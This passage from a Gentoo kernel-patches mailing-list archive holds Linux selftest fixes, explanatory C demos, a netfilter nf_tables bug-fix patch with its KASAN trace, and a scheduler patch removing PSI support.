+@@ -1141,7 +1140,14 @@ static int validate_rx_dropped(struct ifobject *ifobject)
+ 	if (err)
+ 		return TEST_FAILURE;
+ 
+-	if (stats.rx_dropped == ifobject->pkt_stream->nb_pkts / 2)
++	/* The receiver calls getsockopt after receiving the last (valid)
++	 * packet which is not the final packet sent in this test (valid and
++	 * invalid packets are sent in alternating fashion with the final
++	 * packet being invalid). Since the last packet may or may not have
++	 * been dropped already, both outcomes must be allowed.
++	 */
++	if (stats.rx_dropped == ifobject->pkt_stream->nb_pkts / 2 ||
++	    stats.rx_dropped == ifobject->pkt_stream->nb_pkts / 2 - 1)
+ 		return TEST_PASS;
+ 
+ 	return TEST_FAILURE;
+@@ -1661,6 +1667,7 @@ static void testapp_single_pkt(struct test_spec *test)
+ 
+ static void testapp_invalid_desc(struct test_spec *test)
+ {
++	u64 umem_size = test->ifobj_tx->umem->num_frames * test->ifobj_tx->umem->frame_size;
+ 	struct pkt pkts[] = {
+ 		/* Zero packet address allowed */
+ 		{0, PKT_SIZE, 0, true},
+@@ -1671,9 +1678,9 @@ static void testapp_invalid_desc(struct test_spec *test)
+ 		/* Packet too large */
+ 		{0x2000, XSK_UMEM__INVALID_FRAME_SIZE, 0, false},
+ 		/* After umem ends */
+-		{UMEM_SIZE, PKT_SIZE, 0, false},
++		{umem_size, PKT_SIZE, 0, false},
+ 		/* Straddle the end of umem */
+-		{UMEM_SIZE - PKT_SIZE / 2, PKT_SIZE, 0, false},
++		{umem_size - PKT_SIZE / 2, PKT_SIZE, 0, false},
+ 		/* Straddle a page boundary */
+ 		{0x3000 - PKT_SIZE / 2, PKT_SIZE, 0, false},
+ 		/* Straddle a 2K boundary */
+@@ -1691,8 +1698,8 @@ static void testapp_invalid_desc(struct test_spec *test)
+ 	}
+ 
+ 	if (test->ifobj_tx->shared_umem) {
+-		pkts[4].addr += UMEM_SIZE;
+-		pkts[5].addr += UMEM_SIZE;
++		pkts[4].addr += umem_size;
++		pkts[5].addr += umem_size;
+ 	}
+ 
+ 	pkt_stream_generate_custom(test, pkts, ARRAY_SIZE(pkts));
+diff --git a/tools/testing/selftests/bpf/xskxceiver.h b/tools/testing/selftests/bpf/xskxceiver.h
+index edb76d2def9fe..292fc943b8fdf 100644
+--- a/tools/testing/selftests/bpf/xskxceiver.h
++++ b/tools/testing/selftests/bpf/xskxceiver.h
+@@ -52,7 +52,6 @@
+ #define THREAD_TMOUT 3
+ #define DEFAULT_PKT_CNT (4 * 1024)
+ #define DEFAULT_UMEM_BUFFERS (DEFAULT_PKT_CNT / 4)
+-#define UMEM_SIZE (DEFAULT_UMEM_BUFFERS * XSK_UMEM__DEFAULT_FRAME_SIZE)
+ #define RX_FULL_RXQSIZE 32
+ #define UMEM_HEADROOM_TEST_SIZE 128
+ #define XSK_UMEM__INVALID_FRAME_SIZE (XSK_UMEM__DEFAULT_FRAME_SIZE + 1)
+diff --git a/tools/testing/selftests/mount_setattr/mount_setattr_test.c b/tools/testing/selftests/mount_setattr/mount_setattr_test.c
+index 8c5fea68ae677..969647228817b 100644
+--- a/tools/testing/selftests/mount_setattr/mount_setattr_test.c
++++ b/tools/testing/selftests/mount_setattr/mount_setattr_test.c
+@@ -18,6 +18,7 @@
+ #include <grp.h>
+ #include <stdbool.h>
+ #include <stdarg.h>
++#include <linux/mount.h>
+ 
+ #include "../kselftest_harness.h"
+ 
+diff --git a/tools/testing/selftests/powerpc/pmu/sampling_tests/mmcra_thresh_marked_sample_test.c b/tools/testing/selftests/powerpc/pmu/sampling_tests/mmcra_thresh_marked_sample_test.c
+index 022cc1655eb52..75527876ad3c1 100644
+--- a/tools/testing/selftests/powerpc/pmu/sampling_tests/mmcra_thresh_marked_sample_test.c
++++ b/tools/testing/selftests/powerpc/pmu/sampling_tests/mmcra_thresh_marked_sample_test.c
+@@ -63,9 +63,9 @@ static int mmcra_thresh_marked_sample(void)
+ 			get_mmcra_thd_stop(get_reg_value(intr_regs, "MMCRA"), 4));
+ 	FAIL_IF(EV_CODE_EXTRACT(event.attr.config, marked) !=
+ 			get_mmcra_marked(get_reg_value(intr_regs, "MMCRA"), 4));
+-	FAIL_IF(EV_CODE_EXTRACT(event.attr.config, sample >> 2) !=
++	FAIL_IF((EV_CODE_EXTRACT(event.attr.config, sample) >> 2) !=
+ 			get_mmcra_rand_samp_elig(get_reg_value(intr_regs, "MMCRA"), 4));
+-	FAIL_IF(EV_CODE_EXTRACT(event.attr.config, sample & 0x3) !=
++	FAIL_IF((EV_CODE_EXTRACT(event.attr.config, sample) & 0x3) !=
+ 			get_mmcra_sample_mode(get_reg_value(intr_regs, "MMCRA"), 4));
+ 	FAIL_IF(EV_CODE_EXTRACT(event.attr.config, sm) !=
+ 			get_mmcra_sm(get_reg_value(intr_regs, "MMCRA"), 4));
+diff --git a/tools/testing/selftests/resctrl/cache.c b/tools/testing/selftests/resctrl/cache.c
+index 68ff856d36f0b..0485863a169f2 100644
+--- a/tools/testing/selftests/resctrl/cache.c
++++ b/tools/testing/selftests/resctrl/cache.c
+@@ -244,10 +244,12 @@ int cat_val(struct resctrl_val_param *param)
+ 	while (1) {
+ 		if (!strncmp(resctrl_val, CAT_STR, sizeof(CAT_STR))) {
+ 			ret = param->setup(1, param);
+-			if (ret) {
++			if (ret == END_OF_TESTS) {
+ 				ret = 0;
+ 				break;
+ 			}
++			if (ret < 0)
++				break;
+ 			ret = reset_enable_llc_perf(bm_pid, param->cpu_no);
+ 			if (ret)
+ 				break;
+diff --git a/tools/testing/selftests/resctrl/cat_test.c b/tools/testing/selftests/resctrl/cat_test.c
+index 1c5e90c632548..2d3c7c77ab6cb 100644
+--- a/tools/testing/selftests/resctrl/cat_test.c
++++ b/tools/testing/selftests/resctrl/cat_test.c
+@@ -40,7 +40,7 @@ static int cat_setup(int num, ...)
+ 
+ 	/* Run NUM_OF_RUNS times */
+ 	if (p->num_of_runs >= NUM_OF_RUNS)
+-		return -1;
++		return END_OF_TESTS;
+ 
+ 	if (p->num_of_runs == 0) {
+ 		sprintf(schemata, "%lx", p->mask);
+diff --git a/tools/testing/selftests/resctrl/cmt_test.c b/tools/testing/selftests/resctrl/cmt_test.c
+index 8968e36db99d7..3b0454e7fc826 100644
+--- a/tools/testing/selftests/resctrl/cmt_test.c
++++ b/tools/testing/selftests/resctrl/cmt_test.c
+@@ -32,7 +32,7 @@ static int cmt_setup(int num, ...)
+ 
+ 	/* Run NUM_OF_RUNS times */
+ 	if (p->num_of_runs >= NUM_OF_RUNS)
+-		return -1;
++		return END_OF_TESTS;
+ 
+ 	p->num_of_runs++;
+ 
+diff --git a/tools/testing/selftests/resctrl/fill_buf.c b/tools/testing/selftests/resctrl/fill_buf.c
+index 56ccbeae0638d..c20d0a7ecbe63 100644
+--- a/tools/testing/selftests/resctrl/fill_buf.c
++++ b/tools/testing/selftests/resctrl/fill_buf.c
+@@ -68,6 +68,8 @@ static void *malloc_and_init_memory(size_t s)
+ 	size_t s64;
+ 
+ 	void *p = memalign(PAGE_SIZE, s);
++	if (!p)
++		return NULL;
+ 
+ 	p64 = (uint64_t *)p;
+ 	s64 = s / sizeof(uint64_t);
+diff --git a/tools/testing/selftests/resctrl/mba_test.c b/tools/testing/selftests/resctrl/mba_test.c
+index 1a1bdb6180cf2..97dc98c0c9497 100644
+--- a/tools/testing/selftests/resctrl/mba_test.c
++++ b/tools/testing/selftests/resctrl/mba_test.c
+@@ -28,6 +28,7 @@ static int mba_setup(int num, ...)
+ 	struct resctrl_val_param *p;
+ 	char allocation_str[64];
+ 	va_list param;
++	int ret;
+ 
+ 	va_start(param, num);
+ 	p = va_arg(param, struct resctrl_val_param *);
+@@ -41,11 +42,15 @@ static int mba_setup(int num, ...)
+ 		return 0;
+ 
+ 	if (allocation < ALLOCATION_MIN || allocation > ALLOCATION_MAX)
+-		return -1;
++		return END_OF_TESTS;
+ 
+ 	sprintf(allocation_str, "%d", allocation);
+ 
+-	write_schemata(p->ctrlgrp, allocation_str, p->cpu_no, p->resctrl_val);
++	ret = write_schemata(p->ctrlgrp, allocation_str, p->cpu_no,
++			     p->resctrl_val);
++	if (ret < 0)
++		return ret;
++
+ 	allocation -= ALLOCATION_STEP;
+ 
+ 	return 0;
+diff --git a/tools/testing/selftests/resctrl/mbm_test.c b/tools/testing/selftests/resctrl/mbm_test.c
+index 8392e5c55ed02..280187628054d 100644
+--- a/tools/testing/selftests/resctrl/mbm_test.c
++++ b/tools/testing/selftests/resctrl/mbm_test.c
+@@ -95,7 +95,7 @@ static int mbm_setup(int num, ...)
+ 
+ 	/* Run NUM_OF_RUNS times */
+ 	if (num_of_runs++ >= NUM_OF_RUNS)
+-		return -1;
++		return END_OF_TESTS;
+ 
+ 	va_start(param, num);
+ 	p = va_arg(param, struct resctrl_val_param *);
+diff --git a/tools/testing/selftests/resctrl/resctrl.h b/tools/testing/selftests/resctrl/resctrl.h
+index f0ded31fb3c7c..f44fa2de4d986 100644
+--- a/tools/testing/selftests/resctrl/resctrl.h
++++ b/tools/testing/selftests/resctrl/resctrl.h
+@@ -37,6 +37,8 @@
+ #define ARCH_INTEL     1
+ #define ARCH_AMD       2
+ 
++#define END_OF_TESTS	1
++
+ #define PARENT_EXIT(err_msg)			\
+ 	do {					\
+ 		perror(err_msg);		\
+diff --git a/tools/testing/selftests/resctrl/resctrl_val.c b/tools/testing/selftests/resctrl/resctrl_val.c
+index b32b96356ec70..00864242d76c6 100644
+--- a/tools/testing/selftests/resctrl/resctrl_val.c
++++ b/tools/testing/selftests/resctrl/resctrl_val.c
+@@ -734,29 +734,24 @@ int resctrl_val(char **benchmark_cmd, struct resctrl_val_param *param)
+ 
+ 	/* Test runs until the callback setup() tells the test to stop. */
+ 	while (1) {
++		ret = param->setup(1, param);
++		if (ret == END_OF_TESTS) {
++			ret = 0;
++			break;
++		}
++		if (ret < 0)
++			break;
++
+ 		if (!strncmp(resctrl_val, MBM_STR, sizeof(MBM_STR)) ||
+ 		    !strncmp(resctrl_val, MBA_STR, sizeof(MBA_STR))) {
+-			ret = param->setup(1, param);
+-			if (ret) {
+-				ret = 0;
+-				break;
+-			}
+-
+ 			ret = measure_vals(param, &bw_resc_start);
+ 			if (ret)
+ 				break;
+ 		} else if (!strncmp(resctrl_val, CMT_STR, sizeof(CMT_STR))) {
+-			ret = param->setup(1, param);
+-			if (ret) {
+-				ret = 0;
+-				break;
+-			}
+ 			sleep(1);
+ 			ret = measure_cache_vals(param, bm_pid);
+ 			if (ret)
+ 				break;
+-		} else {
+-			break;
+ 		}
+ 	}
+ 
+diff --git a/tools/testing/selftests/tc-testing/tc-tests/qdiscs/fq.json b/tools/testing/selftests/tc-testing/tc-tests/qdiscs/fq.json
+index 8acb904d14193..3593fb8f79ad3 100644
+--- a/tools/testing/selftests/tc-testing/tc-tests/qdiscs/fq.json
++++ b/tools/testing/selftests/tc-testing/tc-tests/qdiscs/fq.json
+@@ -114,6 +114,28 @@
+             "$IP link del dev $DUMMY type dummy"
+         ]
+     },
++    {
++        "id": "10f7",
++        "name": "Create FQ with invalid initial_quantum setting",
++        "category": [
++            "qdisc",
++            "fq"
++        ],
++        "plugins": {
++            "requires": "nsPlugin"
++        },
++        "setup": [
++            "$IP link add dev $DUMMY type dummy || /bin/true"
++        ],
++        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root fq initial_quantum 0x80000000",
++        "expExitCode": "2",
++        "verifyCmd": "$TC qdisc show dev $DUMMY",
++        "matchPattern": "qdisc fq 1: root.*initial_quantum 2048Mb",
++        "matchCount": "0",
++        "teardown": [
++            "$IP link del dev $DUMMY type dummy"
++        ]
++    },
+     {
+         "id": "9398",
+         "name": "Create FQ with maxrate setting",
+diff --git a/tools/testing/selftests/user_events/ftrace_test.c b/tools/testing/selftests/user_events/ftrace_test.c
+index 404a2713dcae8..1bc26e6476fc3 100644
+--- a/tools/testing/selftests/user_events/ftrace_test.c
++++ b/tools/testing/selftests/user_events/ftrace_test.c
+@@ -294,6 +294,11 @@ TEST_F(user, write_events) {
+ 	ASSERT_NE(-1, writev(self->data_fd, (const struct iovec *)io, 3));
+ 	after = trace_bytes();
+ 	ASSERT_GT(after, before);
++
++	/* Negative index should fail with EINVAL */
++	reg.write_index = -1;
++	ASSERT_EQ(-1, writev(self->data_fd, (const struct iovec *)io, 3));
++	ASSERT_EQ(EINVAL, errno);
+ }
+ 
+ TEST_F(user, write_fault) {

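A side note on the perf sampling changes in the selftest hunks above: rather
than hard-coding .sample_period = 5000, the tests now sample by frequency,
capped at the limit the kernel advertises through
/proc/sys/kernel/perf_event_max_sample_rate, using the
read_perf_max_sample_freq() helper consolidated into testing_helpers.c. A
minimal standalone sketch of that pattern (the sysctl path and the 5000
fallback are taken from the patch; the event setup mirrors the
perf_event_stackmap change, and main() is only a demo harness, not part of
the selftests):

#include <stdio.h>
#include <linux/perf_event.h>

/* Mirrors the consolidated helper: read the system-wide sampling
 * limit, falling back to 5000 if the sysctl cannot be read. */
static unsigned long long read_perf_max_sample_freq(void)
{
	unsigned long long sample_freq = 5000;
	FILE *f = fopen("/proc/sys/kernel/perf_event_max_sample_rate", "r");

	if (!f)
		return sample_freq;
	if (fscanf(f, "%llu", &sample_freq) != 1)
		sample_freq = 5000;
	fclose(f);
	return sample_freq;
}

int main(void)
{
	/* Frequency-based sampling clamped to the sysctl limit, as in
	 * the perf_event_stackmap fix, instead of a fixed period. */
	struct perf_event_attr attr = {
		.type = PERF_TYPE_HARDWARE,
		.config = PERF_COUNT_HW_CPU_CYCLES,
		.freq = 1,
		.sample_freq = read_perf_max_sample_freq(),
		.size = sizeof(struct perf_event_attr),
	};

	printf("requested sample_freq = %llu\n",
	       (unsigned long long)attr.sample_freq);
	return 0;
}

This keeps the requested rate within whatever limit the running kernel
enforces, so the tests behave the same on machines where the sysctl has
been lowered.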

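The powerpc mmcra_thresh_marked_sample fix above is a pure
operator-precedence repair: the >> 2 and & 0x3 belong on the result of
EV_CODE_EXTRACT(), not inside its argument list. A small demo of how the two
forms diverge (EXTRACT() below is an assumed single-argument stand-in, not
the selftest's real two-argument macro):

#include <stdio.h>

/* Assumed stand-in: extract a 5-bit field starting at bit 8 from an
 * event config word. */
#define EXTRACT(cfg) (((cfg) >> 8) & 0x1f)

int main(void)
{
	unsigned long cfg = 0x6d00;	/* field (bits 8-12) holds 0xd */

	/* Buggy form: shifts the whole config before extracting, so
	 * bits 13-14, which lie outside the field, leak into the result. */
	printf("EXTRACT(cfg >> 2) = %#lx\n", EXTRACT(cfg >> 2));	/* 0x1b */
	/* Fixed form: extract first, then shift the field value. */
	printf("EXTRACT(cfg) >> 2 = %#lx\n", EXTRACT(cfg) >> 2);	/* 0x3 */
	return 0;
}
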
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-05-10 17:54 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-05-10 17:54 UTC (permalink / raw
  To: gentoo-commits

commit:     c2a4766b45c38541eebdfb6ce7b55bcce87c962d
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed May 10 17:53:24 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed May 10 17:53:24 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=c2a4766b

netfilter: nf_tables: deactivate anonymous set from preparation phase

Bug: https://bugs.gentoo.org/90606

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |   4 +
 ...nf-tables-make-deleted-anon-sets-inactive.patch | 121 +++++++++++++++++++++
 2 files changed, 125 insertions(+)

diff --git a/0000_README b/0000_README
index 5e14a47f..1f28562c 100644
--- a/0000_README
+++ b/0000_README
@@ -159,6 +159,10 @@ Patch:  1510_fs-enable-link-security-restrictions-by-default.patch
 From:   http://sources.debian.net/src/linux/3.16.7-ckt4-3/debian/patches/debian/fs-enable-link-security-restrictions-by-default.patch/
 Desc:   Enable link security restrictions by default.
 
+Patch:  1520_nf-tables-make-deleted-anon-sets-inactive.patch
+From:   https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/patch/?id=c1592a89942e9678f7d9c8030efa777c0d57edab
+Desc:   netfilter: nf_tables: deactivate anonymous set from preparation phase
+
 Patch:  1700_sparc-address-warray-bound-warnings.patch
 From:		https://github.com/KSPP/linux/issues/109
 Desc:		Address -Warray-bounds warnings 

diff --git a/1520_nf-tables-make-deleted-anon-sets-inactive.patch b/1520_nf-tables-make-deleted-anon-sets-inactive.patch
new file mode 100644
index 00000000..cd75de5c
--- /dev/null
+++ b/1520_nf-tables-make-deleted-anon-sets-inactive.patch
@@ -0,0 +1,121 @@
+From c1592a89942e9678f7d9c8030efa777c0d57edab Mon Sep 17 00:00:00 2001
+From: Pablo Neira Ayuso <pablo@netfilter.org>
+Date: Tue, 2 May 2023 10:25:24 +0200
+Subject: netfilter: nf_tables: deactivate anonymous set from preparation phase
+
+Toggle deleted anonymous sets as inactive in the next generation, so
+users cannot perform any update on them. Clear the generation bitmask
+in case the transaction is aborted.
+
+The following KASAN splat shows a set element deletion for a bound
+anonymous set that has been already removed in the same transaction.
+
+[   64.921510] ==================================================================
+[   64.923123] BUG: KASAN: wild-memory-access in nf_tables_commit+0xa24/0x1490 [nf_tables]
+[   64.924745] Write of size 8 at addr dead000000000122 by task test/890
+[   64.927903] CPU: 3 PID: 890 Comm: test Not tainted 6.3.0+ #253
+[   64.931120] Call Trace:
+[   64.932699]  <TASK>
+[   64.934292]  dump_stack_lvl+0x33/0x50
+[   64.935908]  ? nf_tables_commit+0xa24/0x1490 [nf_tables]
+[   64.937551]  kasan_report+0xda/0x120
+[   64.939186]  ? nf_tables_commit+0xa24/0x1490 [nf_tables]
+[   64.940814]  nf_tables_commit+0xa24/0x1490 [nf_tables]
+[   64.942452]  ? __kasan_slab_alloc+0x2d/0x60
+[   64.944070]  ? nf_tables_setelem_notify+0x190/0x190 [nf_tables]
+[   64.945710]  ? kasan_set_track+0x21/0x30
+[   64.947323]  nfnetlink_rcv_batch+0x709/0xd90 [nfnetlink]
+[   64.948898]  ? nfnetlink_rcv_msg+0x480/0x480 [nfnetlink]
+
+Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
+---
+ include/net/netfilter/nf_tables.h |  1 +
+ net/netfilter/nf_tables_api.c     | 12 ++++++++++++
+ net/netfilter/nft_dynset.c        |  2 +-
+ net/netfilter/nft_lookup.c        |  2 +-
+ net/netfilter/nft_objref.c        |  2 +-
+ 5 files changed, 16 insertions(+), 3 deletions(-)
+
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index 3ed21d2d56590..2e24ea1d744c2 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -619,6 +619,7 @@ struct nft_set_binding {
+ };
+ 
+ enum nft_trans_phase;
++void nf_tables_activate_set(const struct nft_ctx *ctx, struct nft_set *set);
+ void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 			      struct nft_set_binding *binding,
+ 			      enum nft_trans_phase phase);
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 8b6c61a2196cb..59fb8320ab4d7 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -5127,12 +5127,24 @@ static void nf_tables_unbind_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 	}
+ }
+ 
++void nf_tables_activate_set(const struct nft_ctx *ctx, struct nft_set *set)
++{
++	if (nft_set_is_anonymous(set))
++		nft_clear(ctx->net, set);
++
++	set->use++;
++}
++EXPORT_SYMBOL_GPL(nf_tables_activate_set);
++
+ void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 			      struct nft_set_binding *binding,
+ 			      enum nft_trans_phase phase)
+ {
+ 	switch (phase) {
+ 	case NFT_TRANS_PREPARE:
++		if (nft_set_is_anonymous(set))
++			nft_deactivate_next(ctx->net, set);
++
+ 		set->use--;
+ 		return;
+ 	case NFT_TRANS_ABORT:
+diff --git a/net/netfilter/nft_dynset.c b/net/netfilter/nft_dynset.c
+index 274579b1696e0..bd19c7aec92ee 100644
+--- a/net/netfilter/nft_dynset.c
++++ b/net/netfilter/nft_dynset.c
+@@ -342,7 +342,7 @@ static void nft_dynset_activate(const struct nft_ctx *ctx,
+ {
+ 	struct nft_dynset *priv = nft_expr_priv(expr);
+ 
+-	priv->set->use++;
++	nf_tables_activate_set(ctx, priv->set);
+ }
+ 
+ static void nft_dynset_destroy(const struct nft_ctx *ctx,
+diff --git a/net/netfilter/nft_lookup.c b/net/netfilter/nft_lookup.c
+index cecf8ab90e58f..03ef4fdaa460b 100644
+--- a/net/netfilter/nft_lookup.c
++++ b/net/netfilter/nft_lookup.c
+@@ -167,7 +167,7 @@ static void nft_lookup_activate(const struct nft_ctx *ctx,
+ {
+ 	struct nft_lookup *priv = nft_expr_priv(expr);
+ 
+-	priv->set->use++;
++	nf_tables_activate_set(ctx, priv->set);
+ }
+ 
+ static void nft_lookup_destroy(const struct nft_ctx *ctx,
+diff --git a/net/netfilter/nft_objref.c b/net/netfilter/nft_objref.c
+index cb37169608bab..a48dd5b5d45b1 100644
+--- a/net/netfilter/nft_objref.c
++++ b/net/netfilter/nft_objref.c
+@@ -185,7 +185,7 @@ static void nft_objref_map_activate(const struct nft_ctx *ctx,
+ {
+ 	struct nft_objref_map *priv = nft_expr_priv(expr);
+ 
+-	priv->set->use++;
++	nf_tables_activate_set(ctx, priv->set);
+ }
+ 
+ static void nft_objref_map_destroy(const struct nft_ctx *ctx,
+-- 
+cgit 
+

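For readers unfamiliar with nf_tables generations: the fix pairs
nft_deactivate_next() in the prepare phase with nft_clear() on activation, so
an aborted transaction makes the anonymous set visible again instead of
leaving it half-dead. A toy userspace model of that pairing (the two-bit
genmask, the struct, and the function names below are simplifications for
illustration, not the kernel's real definitions):

#include <stdbool.h>
#include <stdio.h>

/* Toy model: bit 1 of genmask marks "inactive in the next generation",
 * which is what nft_deactivate_next() sets and nft_clear() removes. */
struct toy_set {
	unsigned int genmask;
	unsigned int use;
	bool anonymous;
};

static void deactivate_prepare(struct toy_set *s)
{
	if (s->anonymous)
		s->genmask |= 0x2;	/* hidden once the next gen commits */
	s->use--;
}

static void activate_on_abort(struct toy_set *s)
{
	if (s->anonymous)
		s->genmask &= ~0x2u;	/* abort: make it visible again */
	s->use++;
}

int main(void)
{
	struct toy_set s = { .genmask = 0, .use = 1, .anonymous = true };

	deactivate_prepare(&s);		/* NFT_TRANS_PREPARE */
	activate_on_abort(&s);		/* transaction aborted */
	printf("use=%u genmask=%#x\n", s.use, s.genmask);
	return 0;
}

The kernel does the same bookkeeping on the real set object, with the
generation bitmask interpreted by the transaction commit machinery.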

* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-05-10 16:18 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-05-10 16:18 UTC (permalink / raw
  To: gentoo-commits

commit:     0e55467b3ca9ea55712b0ccee496a00d8a5c007f
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed May 10 16:11:31 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed May 10 16:11:31 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=0e55467b

sched/alt: Remove psi support

Bug: https://bugs.gentoo.org/904514

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                               |  4 ++
 5022_BMQ-and-PDS-remove-psi-support.patch | 94 +++++++++++++++++++++++++++++++
 2 files changed, 98 insertions(+)

diff --git a/0000_README b/0000_README
index 92e8a587..5e14a47f 100644
--- a/0000_README
+++ b/0000_README
@@ -206,3 +206,7 @@ Desc:   BMQ(BitMap Queue) Scheduler. A new CPU scheduler developed from PDS(incl
 Patch:  5021_BMQ-and-PDS-gentoo-defaults.patch
 From:   https://gitweb.gentoo.org/proj/linux-patches.git/
 Desc:   Set defaults for BMQ. Add archs as people test, default to N
+
+Patch:  5022_BMQ-and-PDS-remove-psi-support.patch
+From:   https://gitweb.gentoo.org/proj/linux-patches.git/
+Desc:   Sched/alt: Remove psi support 

diff --git a/5022_BMQ-and-PDS-remove-psi-support.patch b/5022_BMQ-and-PDS-remove-psi-support.patch
new file mode 100644
index 00000000..4390e2d5
--- /dev/null
+++ b/5022_BMQ-and-PDS-remove-psi-support.patch
@@ -0,0 +1,94 @@
+From 542887ccaeadc65843ec171bccc87f8aa8bbca95 Mon Sep 17 00:00:00 2001
+From: Alfred Chen <cchalpha@gmail.com>
+Date: Wed, 26 Apr 2023 16:38:14 +0000
+Subject: [PATCH] sched/alt: Remove psi support
+
+There are issues (#70, #72, #79) with psi support. Remove psi
+support, as it doesn't bring much gain.
+---
+ init/Kconfig             | 1 +
+ kernel/sched/alt_core.c  | 8 --------
+ kernel/sched/alt_sched.h | 1 -
+ 3 files changed, 1 insertion(+), 9 deletions(-)
+
+diff --git a/init/Kconfig b/init/Kconfig
+index 454f792df9dd..dff86592555a 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -629,6 +629,7 @@ config TASK_IO_ACCOUNTING
+ 
+ config PSI
+ 	bool "Pressure stall information tracking"
++	depends on !SCHED_ALT
+ 	help
+ 	  Collect metrics that indicate how overcommitted the CPU, memory,
+ 	  and IO capacity are in the system.
+diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
+index af4d840d4bb7..37dfdc41d2a7 100644
+--- a/kernel/sched/alt_core.c
++++ b/kernel/sched/alt_core.c
+@@ -588,7 +588,6 @@ static void update_rq_clock_task(struct rq *rq, s64 delta)
+ 
+ 	rq->prev_irq_time += irq_delta;
+ 	delta -= irq_delta;
+-	psi_account_irqtime(rq->curr, irq_delta);
+ #endif
+ #ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
+ 	if (static_key_false((&paravirt_steal_rq_enabled))) {
+@@ -769,7 +768,6 @@ unsigned long get_wchan(struct task_struct *p)
+  */
+ #define __SCHED_DEQUEUE_TASK(p, rq, flags, func)				\
+ 	sched_info_dequeue(rq, p);						\
+-	psi_dequeue(p, flags & DEQUEUE_SLEEP);					\
+ 										\
+ 	list_del(&p->sq_node);							\
+ 	if (list_empty(&rq->queue.heads[p->sq_idx])) { 				\
+@@ -779,7 +777,6 @@ unsigned long get_wchan(struct task_struct *p)
+ 
+ #define __SCHED_ENQUEUE_TASK(p, rq, flags)				\
+ 	sched_info_enqueue(rq, p);					\
+-	psi_enqueue(p, flags & ENQUEUE_WAKEUP);				\
+ 									\
+ 	p->sq_idx = task_sched_prio_idx(p, rq);				\
+ 	list_add_tail(&p->sq_node, &rq->queue.heads[p->sq_idx]);	\
+@@ -2954,7 +2951,6 @@ static int try_to_wake_up(struct task_struct *p, unsigned int state,
+ 		}
+ 
+ 		wake_flags |= WF_MIGRATED;
+-		psi_ttwu_dequeue(p);
+ 		set_task_cpu(p, cpu);
+ 	}
+ #else
+@@ -4828,8 +4824,6 @@ static void __sched notrace __schedule(unsigned int sched_mode)
+ 		 */
+ 		++*switch_count;
+ 
+-		psi_sched_switch(prev, next, !task_on_rq_queued(prev));
+-
+ 		trace_sched_switch(sched_mode & SM_MASK_PREEMPT, prev, next, prev_state);
+ 
+ 		/* Also unlocks the rq: */
+@@ -7689,8 +7683,6 @@ void __init sched_init(void)
+ 	sched_init_topology_cpumask_early();
+ #endif /* SMP */
+ 
+-	psi_init();
+-
+ 	preempt_dynamic_init();
+ }
+ 
+diff --git a/kernel/sched/alt_sched.h b/kernel/sched/alt_sched.h
+index 9fe45bf0cedf..55a15b806e87 100644
+--- a/kernel/sched/alt_sched.h
++++ b/kernel/sched/alt_sched.h
+@@ -3,7 +3,6 @@
+ 
+ #include <linux/context_tracking.h>
+ #include <linux/profile.h>
+-#include <linux/psi.h>
+ #include <linux/stop_machine.h>
+ #include <linux/syscalls.h>
+ #include <linux/tick.h>
+-- 
+GitLab
+


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-04-30 23:50 Alice Ferrazzi
  0 siblings, 0 replies; 161+ messages in thread
From: Alice Ferrazzi @ 2023-04-30 23:50 UTC (permalink / raw
  To: gentoo-commits

commit:     2a437e58f60cda8d56e9fc7d09c27b88d0f319f6
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Sun Apr 30 23:50:47 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Sun Apr 30 23:50:47 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=2a437e58

Linux patch 6.1.27

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README             |   4 +
 1026_linux-6.1.27.patch | 914 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 918 insertions(+)

diff --git a/0000_README b/0000_README
index 2dab4c18..92e8a587 100644
--- a/0000_README
+++ b/0000_README
@@ -147,6 +147,10 @@ Patch:  1025_linux-6.1.26.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.26
 
+Patch:  1026_linux-6.1.27.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.27
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1026_linux-6.1.27.patch b/1026_linux-6.1.27.patch
new file mode 100644
index 00000000..be1b81be
--- /dev/null
+++ b/1026_linux-6.1.27.patch
@@ -0,0 +1,914 @@
